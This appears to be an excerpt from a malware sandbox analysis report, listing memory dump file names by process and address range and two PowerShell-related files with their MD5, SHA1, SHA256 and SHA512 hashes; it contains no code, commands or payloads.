memory/396-129-0x0000000000000000-mapping.dmp
memory/3708-130-0x0000000000000000-mapping.dmp
memory/3876-131-0x0000000000000000-mapping.dmp
memory/3056-132-0x0000000000000000-mapping.dmp
memory/1740-133-0x0000000000000000-mapping.dmp
memory/2344-134-0x0000000000000000-mapping.dmp
memory/2284-135-0x0000000000000000-mapping.dmp
memory/3436-136-0x0000000000000000-mapping.dmp
memory/2820-137-0x0000000000000000-mapping.dmp
memory/2064-138-0x0000000000000000-mapping.dmp
memory/1912-139-0x0000000000000000-mapping.dmp
memory/1988-140-0x0000000000000000-mapping.dmp
memory/2236-141-0x0000000000000000-mapping.dmp
memory/2744-142-0x0000000000000000-mapping.dmp
memory/2972-143-0x0000000000000000-mapping.dmp
memory/1232-144-0x0000000000000000-mapping.dmp
memory/3256-145-0x0000000000000000-mapping.dmp
memory/4044-146-0x0000000000000000-mapping.dmp
memory/2068-147-0x0000000000000000-mapping.dmp
memory/3916-148-0x0000000000000000-mapping.dmp
memory/428-149-0x0000000000000000-mapping.dmp
memory/3920-150-0x0000000000000000-mapping.dmp
memory/3196-151-0x0000000000000000-mapping.dmp
memory/1580-152-0x0000000000000000-mapping.dmp
memory/4064-153-0x0000000000000000-mapping.dmp
memory/2080-154-0x0000000000000000-mapping.dmp
memory/2600-155-0x0000000000000000-mapping.dmp
memory/2380-156-0x0000000000000000-mapping.dmp
memory/1056-157-0x0000000000000000-mapping.dmp
memory/3192-158-0x0000000000000000-mapping.dmp
memory/3760-159-0x0000000000000000-mapping.dmp
memory/3900-160-0x0000000000000000-mapping.dmp
memory/812-161-0x0000000000000000-mapping.dmp
memory/1204-162-0x0000000000000000-mapping.dmp
memory/1540-163-0x0000000000000000-mapping.dmp
memory/1732-164-0x0000000000000000-mapping.dmp
memory/2160-165-0x0000000000000000-mapping.dmp
memory/4056-166-0x0000000000000000-mapping.dmp
memory/2748-167-0x0000000000000000-mapping.dmp
memory/3480-168-0x0000000000000000-mapping.dmp
memory/1180-169-0x0000000000000000-mapping.dmp
memory/2980-170-0x0000000000000000-mapping.dmp
memory/3788-171-0x0000000000000000-mapping.dmp
memory/2036-172-0x0000000000000000-mapping.dmp
memory/2300-173-0x0000000000000000-mapping.dmp
memory/3264-174-0x0000000000000000-mapping.dmp
memory/3224-175-0x0000000000000000-mapping.dmp
memory/4036-176-0x0000000000000000-mapping.dmp
memory/2076-177-0x0000000000000000-mapping.dmp
memory/2608-178-0x0000000000000000-mapping.dmp
memory/3272-180-0x000001F896EA0000-0x000001F896EA2000-memory.dmp
memory/3272-179-0x000001F896EA0000-0x000001F896EA2000-memory.dmp
memory/3272-181-0x000001F896EA0000-0x000001F896EA2000-memory.dmp
memory/3272-182-0x000001F896EA0000-0x000001F896EA2000-memory.dmp
memory/3272-183-0x000001F8AF610000-0x000001F8AF632000-memory.dmp
memory/3272-184-0x000001F896EA0000-0x000001F896EA2000-memory.dmp
memory/3272-185-0x000001F896EA0000-0x000001F896EA2000-memory.dmp
memory/3272-186-0x000001F8AF7F0000-0x000001F8AF866000-memory.dmp
memory/3272-187-0x000001F896EA0000-0x000001F896EA2000-memory.dmp
memory/3272-191-0x000001F8AF660000-0x000001F8AF662000-memory.dmp
memory/3272-192-0x000001F8AF663000-0x000001F8AF665000-memory.dmp
memory/3272-193-0x000001F896EA0000-0x000001F896EA2000-memory.dmp
memory/3272-194-0x000001F8AF666000-0x000001F8AF668000-memory.dmp
memory/3272-195-0x000001F896EA0000-0x000001F896EA2000-memory.dmp
memory/3272-215-0x000001F896EA0000-0x000001F896EA2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
memory/1044-218-0x00000267DE930000-0x00000267DE932000-memory.dmp
memory/1044-217-0x00000267DE930000-0x00000267DE932000-memory.dmp
memory/1044-219-0x00000267DE930000-0x00000267DE932000-memory.dmp
memory/1044-220-0x00000267DE930000-0x00000267DE932000-memory.dmp
memory/1044-221-0x00000267DEC20000-0x00000267DEC42000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d22c3c303e60e811ce6c1b56870fcd88 |
| SHA1 | 2c670ff650f0a73d506bd4183f6a2098bce02ef8 |
| SHA256 | 5cd43cbcab810b57561cb15a0568e0cb08ca0b371efcdd27066cd818f1b40728 |
| SHA512 | 8e6bad55654d867ccef1e76942a99604889d6f38df587114eaabc818b335f9ef6a115e5041fb275f1eedd9c5aeb79b99a35b53f4226fdf6988c1dd4960259db1 |
memory/1044-223-0x00000267DE930000-0x00000267DE932000-memory.dmp
memory/1044-224-0x00000267DE930000-0x00000267DE932000-memory.dmp
memory/1044-225-0x00000267F72A0000-0x00000267F7316000-memory.dmp
memory/3272-226-0x000001F8AF668000-0x000001F8AF669000-memory.dmp
memory/1044-227-0x00000267F7110000-0x00000267F7112000-memory.dmp
memory/1044-228-0x00000267F7113000-0x00000267F7115000-memory.dmp
memory/1044-229-0x00000267DE930000-0x00000267DE932000-memory.dmp
memory/1044-233-0x00000267DE930000-0x00000267DE932000-memory.dmp
memory/1044-234-0x00000267DE930000-0x00000267DE932000-memory.dmp
memory/1044-254-0x00000267DE930000-0x00000267DE932000-memory.dmp
memory/1044-255-0x00000267F7116000-0x00000267F7118000-memory.dmp
memory/1044-256-0x00000267F7118000-0x00000267F7119000-memory.dmp